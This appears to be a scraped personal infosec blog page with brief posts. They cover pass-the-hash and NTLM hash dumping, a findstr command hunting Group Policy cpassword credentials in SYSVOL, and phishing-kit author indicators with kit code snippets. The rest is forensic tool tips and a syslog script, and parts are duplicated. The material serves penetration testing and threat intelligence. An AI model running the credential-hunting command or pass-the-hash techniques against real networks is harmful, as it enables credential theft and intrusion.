https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html
https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html
From a pentesting perspective:
- You CAN perform Pass-The-Hash attacks with NTLM hashes.
- You CANNOT perform Pass-The-Hash attacks with Net-NTLM hashes.
You get NTLM hashes when dumping the SAM database of any Windows OS, a Domain Controller's NTDS.dit database or from Mimikatz (Fun fact, although you can't get clear-text passwords from Mimikatz on Windows >= 8.1 you can get NTLM hashes from memory). Some tools just give you the NT hash (e.g. Mimikatz) and that's perfectly fine: obviously you can still Pass-The-Hash with just the NT hash.
Labels:
Mimikatz,
Pass the hash,
Pass-the-hash,
psexec,
PTH,
Responder,
SMB_login
Wednesday, September 25, 2019
find admin pages
Kali -> Applications -> 03 Web Application Analysis -> Web Vulnerabilty Scanners -> jSQL Injection -> Admin page -> Find admin page(s)
Thursday, May 16, 2019
Find Group Policy Passwords
simple windows command to find group policy passwords in xml
findstr /SI cpassword \\DC\sysvol\DOMAIN\Policies\*.xml
e.g. Groups.xml contains cpassword
findstr /SI cpassword \\DC\sysvol\DOMAIN\Policies\*.xml
e.g. Groups.xml contains cpassword
Labels:
cpassword,
gpo,
group policy,
groups.xml,
password
Friday, May 10, 2019
New PhishingKitTracker Blog
Just a heads up I'm moving all my PhishingKitTracker blog posts ( @PhishKitTracker - https://github.com/neonprimetime/PhishingKitTracker ) over to this new blog url
https://phishingkittracker.blogspot.com/
This blog ( @neonprimetime ) will continue to be for #malware and other #infosec topics
https://phishingkittracker.blogspot.com/
This blog ( @neonprimetime ) will continue to be for #malware and other #infosec topics
Tuesday, May 7, 2019
IzLaden - Phishing Kit Author
#izladen #phishingkit author #threatactoremail izladen-Free-Tools@hotmail.com ---- | ★ ★ ★ IzlAden BenGazi FREE TOOLS ★ ★ ★ | ---- |----------| IzlAden BenGazi V3 TEXT RESULT |--------------| Coded By IzlAden BenGazi ===> 2016 / 2017 227ce240dff32a0a35810b0040539ae2 https://www.virustotal.com/#/file/735a16f31af8159af71c40738a22c5638d41bd58144014b9a3fee00390a1da6b/details a9fd8300c7a5654f1ee9247ebdb3e42a https://www.virustotal.com/#/file/7434db52972fd2aa7f253bded2efff92f6069fd9e8ff7beb27c5d998ce803c41/detection c37d8e468a67748c7f9687ecfe39c960 https://www.virustotal.com/#/file/4e1ce76c96c3163d1da5060157b4c0924647e4938843f827f36380837bb7610e/detection
FudPages - Phishing Kit Author
#fudpages #phishingkit author #threatactoremail fudpages@gmail.com ---------------Created BY fudpages(doit)com------------- ---------------Created BY fudpages------------- ----------- FUDPAGES [.] RU -------------- abc845784335374ecb86cc7d9f105ba7 https://www.virustotal.com/#/file/3e76cff314a6b4fef91784f8fab3f21e985f68bd9aa909cdca0245611a3f8757/detection 070a0ebacac551e86ed00e1118f9a969 https://www.virustotal.com/#/file/bcb77cbee636b93320b7f2bcd302e57f32bdc3a8ad34beb95c5e74a3a6d3dc63/detection 69b3f69e5a2b02338fe6577c62d7bf2e https://www.virustotal.com/#/file/c40dc9c4da50c7bbe85c0c88cc2ee2b98ff44104d1bea87ad01fceb1e485b6cc/detection
Labels:
Fud Pages,
FudPages,
FUDPAGES [.] RU,
fudpages(doit)com,
fudpages@gmail.com,
Phishing,
Phishing Kit
Blackshop Tools - Phishing Kit Author
#BlackshopTools #phishingkit author #threatactoremailblackshop.tools@gmail.com skype blackshop tools ICQ 657940639 sell all Spamming & Hacking tools ---------------Created By blackshop.tools------------------------------ 3b2d31dcd6e2e22af611856644d26e21 https://www.virustotal.com/#/file/fa8cf9cb97931eabd0f10cf3dbe8d8820ffa254df7239ce988d6daba4f91cbe3/detection b9b61c8c84c51c292f4800afef8f56d1 https://www.virustotal.com/#/file/463819bd958981039ed47b6cd7efadb516837f19178bb284c0b5124f6cfb572d/detection dc95ec1097920f11590d8aa9ecea50e6 https://www.virustotal.com/#/file/bf4c4aa938d795d011c5e68261f1edc5a79b2c710175b1bb71426ef12910de27/detection 2749a88067675d74bbf01b7776332082 https://www.virustotal.com/#/file/30e67f21d143ddae4af315daca8745ab7fcf2f08fa73326f42b620728e375de1/detection 0e489a50c0be2b93940f835bb6301736 https://www.virustotal.com/#/file/a5f191da51b09b982412490a1f4bfbe64a491a70c90c3fc4f3f3ee4b51abb697/detection 39ddb4f240c0e837b738f5d7f26ea5b1 https://www.virustotal.com/#/file/da51cb87c17a80201738c76fd51d725ebd5d2035230e9be97615bc9003fbad98/detection
CAZANOVA163 - Phishing Kit Author
#CAZANOVA163 #phishingkit author #threatactoremail
CAZANOVA163-Tools@hotmail.com CAZANOVA163-Free-Tools@hotmail.com a357bcfb2779420c95b5a4a2700ab30a https://www.virustotal.com/#/file/5e7c567e561a59f93db854ac91cd7f933fa1dac2622e9a05906964c9e03935fb/details 63f73f4bc9fc243cb919708286c700d8 https://www.virustotal.com/#/file/06be80d28dd6a0cf906b0e7a24054dce23f0a62c982a1eacb83ffbe7073f8dba/details $headers = "From: CAZANOVA163 <CAZANOVA163-Tools@hotmail.com>\r\n"; $headers = "From: CAZANOVA163 <CAZANOVA163-Free-Tools@hotmail.com>\r\n"; <meta name="description" content="xPayPal_2017 v1.1 | Coded By CaZaNoVa163"> <meta name="author" content="CaZaNoVa163">
Labels:
CAZANOVA163,
CAZANOVA163-Free-Tools@hotmail.com,
CAZANOVA163-Tools@hotmail.com,
Phishing,
Phishing Kit
Anonisma - Phishing Kit Author
#threatactoremail #phishing #phishingkit Anonisma-Free-Tools@hotmail.com https://www.virustotal.com/#/file/801806d0cdedfd1ab66ef5b11499df78dcff82c642704bd9d9748c62ccc676d6/detection https://www.virustotal.com/#/file/3c590a371b79c940d76a3c3a24ccda3a93334ba618d2d2473e61053da349a072/detection https://www.virustotal.com/#/file/a4d0f7d275d0b04b8b3ff80a58a24991dfd9800d3972027a8dbde6582cb185f5/detection // Coded By Anonisma ===> 2016 / 2017 include "./includes/lang".$_SESSION['ANONISMA-AYOUB']; ---- | ★ ★ ★ ANONISMA FREE TOOLS ★ ★ ★ | ---- $headers = "From: ANONISMA SMART <Anonisma-Free-Tools@hotmail.com>\r\n"; $text_result_anon .= "|----------| ANONISMA MA DZ TN V3 TEXT RESULT |--------------|\n"; $_SESSION['ANONISMA-AYOUB']="/fr.php"; $_SESSION['ANONISMA-AYOUB']="/es.php"; $_SESSION['ANONISMA-AYOUB']="/it.php"; $_SESSION['ANONISMA-AYOUB']="/ru.php"; $_SESSION['ANONISMA-AYOUB']="/pt.php"; $_SESSION['ANONISMA-AYOUB']="/tr.php"; $_SESSION['ANONISMA-AYOUB']="/pl.php"; $_SESSION['ANONISMA-AYOUB']="/no.php"; $_SESSION['ANONISMA-AYOUB']="/nl.php"; $_SESSION['ANONISMA-AYOUB']="/de.php"; $_SESSION['ANONISMA-AYOUB']="/en.php";
Labels:
Anonisma,
Anonisma Free Tools,
Anonisma-Free-Tools@hotmail.com,
Coded By Anonisma,
Phishing,
Phishing Kit
Friday, May 3, 2019
Wireshark Fix for Error No Protocol Specified
Working through a pen testing lab, was getting access denied when trying to capture.
Tried running sudo and it doesn't let you cause it's a security risk.
But when we're in a pen test lab, i'm ok with that risk.
But I was still getting this error "no protocol specified"
> sudo wireshark
No protocol specified
No protocol specified
(wireshark:3962): Gtk-WARNING **: cannot open display: :0.0
The fix I found
> export XAUTHORITY=/home/mooreted/.Xauthority
> sudo wireshark
Labels:
.Xauthority,
error,
no protocol specified,
Wireshark,
XAuthority
Wednesday, May 1, 2019
Registry Explorer basic usage
Open up a registry hive such as
c:\windows\system32\config\SOFTWARE
with Registry Explorer from Eric Zimmerman
https://ericzimmerman.github.io/#!index.md
to view registry contents
c:\windows\system32\config\SOFTWARE
with Registry Explorer from Eric Zimmerman
https://ericzimmerman.github.io/#!index.md
to view registry contents
Labels:
eric zimmerman,
hive,
regcmd,
Registry,
registryexplorer
Date Time Conversions with DCode
If you have a date/time in numerical format such as in the registry
SOFTWARE\Microsoft\Windows NT\CurrentVersion\InstallDate
1510798682
Use the software DCode with the format: "Unix:Numeric Value" to get the actual date 11/16/2017
https://www.digital-detective.net/dcode/
Thursday, March 14, 2019
python syslog script
useful python syslog i found online
https://github.com/cloudpassage/splunk-halo-python/blob/master/remote_syslog.py
sample usage
syslog('Apr 23 07:36:52 10.2.108.181 EventName=[], SourceIP=[], SourcePort=[], DestinationIP=[], DestinationPort=[], UserName=[], SourceWorkstation=[], Url=[], FilePath=[], MD5=[], LogSource=[], MacAddress=[], LogSourceTime=[], Notes=[]', host='10.xx.xx.xx', facility=FACILITY['local0'], level=LEVEL['info'])
---------------
#!/usr/bin/python
"""
Python syslog client.
This code is placed in the public domain by the author.
Written by Christian Stigen Larsen.
This is especially neat for Windows users, who (I think) don't
get any syslog module in the default python installation.
See RFC3164 for more info -- http://tools.ietf.org/html/rfc3164
Note that if you intend to send messages to remote servers, their
syslogd must be started with -r to allow to receive UDP from
the network.
"""
import socket
# I'm a python novice, so I don't know of better ways to define enums
FACILITY = {
'kern': 0, 'user': 1, 'mail': 2, 'daemon': 3,
'auth': 4, 'syslog': 5, 'lpr': 6, 'news': 7,
'uucp': 8, 'cron': 9, 'authpriv': 10, 'ftp': 11,
'local0': 16, 'local1': 17, 'local2': 18, 'local3': 19,
'local4': 20, 'local5': 21, 'local6': 22, 'local7': 23,
}
LEVEL = {
'emerg': 0, 'alert':1, 'crit': 2, 'err': 3,
'warning': 4, 'notice': 5, 'info': 6, 'debug': 7
}
def syslog(message, level=LEVEL['notice'], facility=FACILITY['daemon'],
host='localhost', port=514):
"""
Send syslog UDP packet to given host and port.
"""
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
data = '<%d>%s' % (level + facility*8, message)
sock.sendto(data, (host, port))
sock.close()
https://github.com/cloudpassage/splunk-halo-python/blob/master/remote_syslog.py
sample usage
syslog('Apr 23 07:36:52 10.2.108.181 EventName=[], SourceIP=[], SourcePort=[], DestinationIP=[], DestinationPort=[], UserName=[], SourceWorkstation=[], Url=[], FilePath=[], MD5=[], LogSource=[], MacAddress=[], LogSourceTime=[], Notes=[]', host='10.xx.xx.xx', facility=FACILITY['local0'], level=LEVEL['info'])
---------------
#!/usr/bin/python
"""
Python syslog client.
This code is placed in the public domain by the author.
Written by Christian Stigen Larsen.
This is especially neat for Windows users, who (I think) don't
get any syslog module in the default python installation.
See RFC3164 for more info -- http://tools.ietf.org/html/rfc3164
Note that if you intend to send messages to remote servers, their
syslogd must be started with -r to allow to receive UDP from
the network.
"""
import socket
# I'm a python novice, so I don't know of better ways to define enums
FACILITY = {
'kern': 0, 'user': 1, 'mail': 2, 'daemon': 3,
'auth': 4, 'syslog': 5, 'lpr': 6, 'news': 7,
'uucp': 8, 'cron': 9, 'authpriv': 10, 'ftp': 11,
'local0': 16, 'local1': 17, 'local2': 18, 'local3': 19,
'local4': 20, 'local5': 21, 'local6': 22, 'local7': 23,
}
LEVEL = {
'emerg': 0, 'alert':1, 'crit': 2, 'err': 3,
'warning': 4, 'notice': 5, 'info': 6, 'debug': 7
}
def syslog(message, level=LEVEL['notice'], facility=FACILITY['daemon'],
host='localhost', port=514):
"""
Send syslog UDP packet to given host and port.
"""
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
data = '<%d>%s' % (level + facility*8, message)
sock.sendto(data, (host, port))
sock.close()
Subscribe to:
Posts (Atom)